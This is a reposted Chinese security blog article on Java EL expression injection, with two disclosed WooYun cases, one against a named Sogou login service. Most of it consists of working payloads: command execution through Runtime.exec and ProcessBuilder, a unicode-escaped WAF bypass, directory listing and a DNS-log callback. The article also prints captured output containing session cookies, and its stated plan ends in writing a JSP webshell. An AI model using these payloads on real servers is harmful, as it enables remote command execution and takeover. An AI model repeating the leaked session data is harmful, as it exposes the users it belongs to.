碼上快樂

相關內容    簡體    繁體

JAVA WEB EL表達式注入

本文轉載自   查看原文   2019-07-04 15:19   1417    滲透測試

  看豬豬俠以前的洞,順便總結下:

一、EL表達式簡介

  EL 全名為Expression Language。EL主要作用:
  1、獲取數據
    EL表達式主要用於替換JSP頁面中的腳本表達式,以從各種類型的web域 中檢索java對象、獲取數據。(某個web域 中的對象,訪問javabean的屬性、訪問list集合、訪問map集合、訪問數組)
  2、執行運算
    利用EL表達式可以在JSP頁面中執行一些基本的關系運算、邏輯運算和算術運算,以在JSP頁面中完成一些簡單的邏輯運算。${user==null}
  3、獲取web開發常用對象
    EL 表達式定義了一些隱式對象,利用這些隱式對象,web開發人員可以很輕松獲得對web常用對象的引用,從而獲得這些對象中的數據。
  4、調用Java方法
    EL表達式允許用戶開發自定義EL函數,以在JSP頁面中通過EL表達式調用Java類的方法。

嗯,這段復制的,詳細鏈接:https://www.cnblogs.com/xdp-gacl/p/3938361.html

 

檢測方式:

  

https://www.a.com/login?a=${10-9}

 表達式執行會會顯在頁面上,檢查源碼。

 

漏洞利用:

${pageContext} 對應於JSP頁面中的pageContext對象(注意:取的是pageContext對象。)

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}   獲取web路徑

${header}  文件頭參數

${applicationScope} 獲取webRoot

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("命令").getInputStream())}  執行命令

  

滲透思路:獲取webroot路徑,exec執行命令echo寫入一句話。

 

烏雲案例一:

詳細說明:

#1 漏洞描述

EL表達式語法允許開發人員開發自定義函數,以調用Java類的方法

#2 影響服務器

http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml

#3 Paylod

code 區域 
groupName=1&papersType=${9999999-444}&papersValue=1&baseacct=1&retMsg=1&retCode=1



icbc1.jpg

 

漏洞證明:

#4 繞過WAF

code 區域 
http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml

companyName=999&groupName=&papersType=${"a9999abbb".toString\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1



tostring.jpg



#5 回顯命令執行

code 區域 
groupName=1&papersType=${%23a%3d\u0028new%20java.lang.ProcessBuilder\u0028new%20java.lang.String[]{\u0027/sbin/ifconfig\u0027,\u0027-a\u0027}\u0029\u0029.start\u0028\u0029,%23b%3d%23a.getInputStream\u0028\u0029,%23c%3dnew%**.**.**.**.InputStreamReader\u0028%23b\u0029,%23d%3dnew%**.**.**.**.BufferedReader\u0028%23c\u0029,%23e%3dnew%20char[50000],%23d.read\u0028%23e\u0029,%23ringzero%3d%23context.get\u0028\u0027com.opensymphony.xwork2.dispatcher.HttpServletResponse\u0027\u0029,%23ringzero.getWriter\u0028\u0029.println\u0028%23e\u0029,%23ringzero.getWriter\u0028\u0029.flush\u0028\u0029,%23ringzero.getWriter\u0028\u0029.close\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1



code 區域 
${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'/sbin/ifconfig','-a'})).start(),#b=#a.getInputStream(),#c=new **.**.**.**.InputStreamReader(#b),#d=new **.**.**.**.BufferedReader(#c),#e=new char[50000],#d.read(#e),#ringzero=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#ringzero.getWriter().println(#e),#ringzero.getWriter().flush(),#ringzero.getWriter().close()}



code 區域 
eth5      Link encap:Ethernet  HWaddr 00:50:56:97:7A:74  

          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:5603928546 errors:0 dropped:0 overruns:0 frame:0

          TX packets:8131434126 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000 

          RX bytes:735168104896 (701110.9 Mb)  TX bytes:11750604019014 (11206249.2 Mb)



lo        Link encap:Local Loopback  

          inet addr:**.**.**.**  Mask:**.**.**.**

          UP LOOPBACK RUNNING  MTU:16436  Metric:1

          RX packets:51371053 errors:0 dropped:0 overruns:0 frame:0

          TX packets:51371053 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:0 

          RX bytes:25387430681 (24211.3 Mb)  TX bytes:25387430681 (24211.3 Mb)



ifconfig.png



#6 列目錄

code 區域 
groupName=1&papersType=${new **.**.**.**.File(\u0027/\u0027).listFiles()[1]}&papersValue=1&baseacct=1&retMsg=1&retCode=1

 

修復方案:

# 表達式不允許來自客戶端調用

 

烏雲案例二:

搜狗某系統存在遠程表達式注入漏洞(命令執行)
EL表達式語法允許開發人員開發自定義函數,以調用Java類的方法

詳細說明:

#1 漏洞地址

code 區域 
https://auth.p4p.sogou.com/login?service=${1000-900}



code 區域 
https://auth.p4p.sogou.com/login?service=${pageContext}

action="/login?service=com.caucho.jsp.PageContextImpl@2aaf3a58" method="post">



#2 表達式執行后的結果返回在頁面

expcetion.png



獲取web路徑

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

file:/opt/local/resin/



code 區域 
https://auth.p4p.sogou.com/login?service=${requestScope}

{javax.servlet.jsp.jstl.fmt.locale=zh_CN, org.springframework.validation.BindingResult.credentials=org.springframework.webflow.mvc.view.BindingModel: 0 errors, flashScope=map[[empty]], flowExecutionUrl=/login?service=%5BLjava.lang.String%3B%40660b2cde, warnCookieValue=false, javax.servlet.forward.servlet_path=/login, org.springframework.web.servlet.support.RequestContext.CONTEXT=Flow ApplicationContext [login]: startup date [Tue Apr 12 21:38:02 CST 2016]; parent: WebApplicationContext for namespace 'eunomia-servlet', org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, caucho.forward=true, javax.servlet.forward.request_uri=/login, javax.servlet.forward.query_string=service=${requestScope}, loginTicket=LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m, javax.servlet.forward.context_path=, phoneValidationModel=com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel@2da91c3c, org.springframework.web.servlet.FlashMapManager.OUTPUT_FLASH_MAP=[Attributes={}, targetRequestPath=null, targetRequestParams={}], flowRequestContext=[RequestControlContextImpl@4bab0382 externalContext = org.springframework.webflow.mvc.servlet.MvcExternalContext@4873729d, currentEvent = viewAcountLogin, requestScope = map[[empty]], attributes = map[[empty]], messageContext = [DefaultMessageContext@1369c694 sourceMessages = map[[null] -> list[[empty]]]], flowExecution = [FlowExecutionImpl@56c2881 flow = 'login', flowSessions = list[[FlowSessionImpl@7fd72fee flow = 'login', state = 'accountViewLoginForm', scope = map['phoneValidationModel' -> com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel@2da91c3c, 'loginTicket' -> 'LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m', 'service' -> ${requestScope}, 'credentials' -> [username: null], 'warnCookieValue' -> false, 'ticketGrantingTicketId' -> [null], 'viewScope' -> map['commandName' -> 'credentials']]]]]], viewScope=map['commandName' -> 'credentials'], javax.servlet.jsp.jstl.fmt.localizationContext=org.springframework.web.servlet.support.JstlUtils$SpringLocalizationContext@88bf3d4, org.springframework.web.servlet.DispatcherServlet.LOCALE_RESOLVER=org.springframework.web.servlet.i18n.CookieLocaleResolver@1c34e7ae, org.springframework.web.servlet.DispatcherServlet.CONTEXT=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, org.springframework.web.servlet.DispatcherServlet.THEME_RESOLVER=org.jasig.cas.services.web.ServiceThemeResolver@55565ef9, flowExecutionKey=e110s1, service=${requestScope}, commandName=credentials, encodingFilter.FILTERED=true, credentials=[username: null]}





code 區域 
https://auth.p4p.sogou.com/login?service=${header}

{Upgrade-Insecure-Requests=1, Accept-Language=zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4, Cookie=SUV=1446734204911570; IPLOC=CN4401; SUID=BA5782774FC80D0A00000000563B6987; pgv_pvi=3484909568; sct=4; LSTMV=703%2C260; LCLKINT=108193; CXID=5CE9FE68778002DCEC30C2A9412EBA10; GOTO=; ad=3wENElllll2Q7p51lllllVtpqM7lllllNcJUWlllll9lllllxTDll5@@@@@@@@@@; _euid=75841017-9d86-4069-9421-d077bd8489ef; JSESSIONID=abcN1iKReDhPacJcOLoqv; session_id_agent_crm=8a089ef7-44bf-493b-81bc-45a327cf03ec, Host=auth.p4p.sogou.com, PROXY_ADDR=10.149.29.104, Accept-Encoding=gzip, deflate, sdch, X-Real-IP=119.130.85.119, X-Forwarded-For=*******, User-Agent=, Connection=close, Accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8}

 

漏洞證明:

EL表達式參考

http://www.cnblogs.com/xdp-gacl/p/3938361.html

利用方式1

code 區域 
${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\u0027ifconfig\u0027).getInputStream())}



#3 執行命令

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("dig sougou.99fd5e.dnslog.info",null).getInputStream())}



CloudEYE:

code 區域 
13-Apr-2016 18:42:50.858 queries: client 208.69.37.21#19674 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)

13-Apr-2016 18:42:53.876 queries: client 208.69.37.17#53756 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)





讀取 ${sessionScope}, 獲取a=InputStream的回顯內容,a=java.io.BufferedInputStream@4d778271



獲取WebROOT

https://auth.p4p.sogou.com/login?service=${applicationScope}

code 區域 
javax.servlet.context.tempdir=/opt/app/eunomia/WEB-INF/tmp,

org.springframework.web.context.WebApplicationContext.ROOT=Root WebApplicationContext



然后就用命令向這個目錄/opt/app/eunomia/ 寫jsp文件了

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 EL表達式 什么是EL表達式? EL表達式 EL表達式 EL表達式 web.xml中JSP配置及 EL表達式 JSTL與EL表達式 EL表達式取值 EL表達式的使用 el 表達式的if else
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM